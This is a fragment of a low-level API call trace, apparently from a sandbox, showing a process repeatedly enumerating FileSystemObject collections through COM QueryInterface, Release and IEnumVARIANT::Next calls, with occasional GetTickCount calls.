	[0046.635] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.635] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.635] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.636] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.637] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.637] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.637] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.640] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.640] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.640] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.641] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.641] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.642] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.642] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.643] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.646] GetTickCount () returned 0x1144edc
	[0046.647] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.647] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.647] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.647] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.648] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.648] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.648] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.648] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.650] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.650] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.650] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.653] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.653] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.653] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.653] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.653] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.654] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.654] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.656] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.656] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.656] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.659] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.659] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.660] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.661] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.661] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.661] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.661] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.662] GetTickCount () returned 0x1144eeb
	[0046.662] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.663] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.663] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.666] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.666] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.666] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.666] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.666] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.667] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.667] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.667] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.667] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.669] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.669] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.669] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.672] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.672] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.672] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.672] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.673] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.673] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.674] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.675] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.675] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.675] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.678] GetTickCount () returned 0x1144efb
	[0046.680] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.680] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.680] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.681] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.681] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.681] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.682] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.682] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.682] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.685] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e748, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.685] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.685] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e6e0) returned 0x0
	[0046.688] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.688] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.688] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.689] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.689] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e6e0) returned 0x0
	[0046.689] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.689] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.690] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.690] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.691] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.693] GetTickCount () returned 0x1144f0b
	[0046.694] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.695] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.695] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.695] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.696] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.696] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.696] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.696] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.698] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.698] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.698] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
